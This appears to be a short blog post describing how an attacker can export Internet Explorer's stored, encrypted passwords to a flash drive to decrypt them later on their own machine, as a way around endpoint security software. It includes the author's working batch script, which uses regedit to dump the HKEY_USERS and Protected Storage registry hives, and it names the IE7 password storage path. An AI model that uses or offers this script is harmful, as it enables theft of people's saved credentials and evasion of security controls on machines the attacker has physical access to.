There is nothing stopping an attacker from exporting IE password files to another machine. This would be useful if a program like Symantec were stopping you from using other tools on the local machine. All an attacker needs is a jump drive or other portable storage device. A script can be created that saves the encrypted registry values to their flash drive. Then they can take import the passwords onto their own machine and use tools to decrypt the passwords. This is a copy of my script:
@ echo off
REM search for storage2 in ie7
mkdir ie_info
mkdir ie_info\%computername%
regedit /E ie_info\%computername%\ie7.reg "HKEY_USERS" > NUL
regedit /E ie_info\%computername%\ie6.reg "HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider\
" > NUl
The IE 7 passwords are stored in the following path:
HKEY_USERS\\Software\Microsoft\Internet Explorer\IntelliForms\Storage2
No comments:
Post a Comment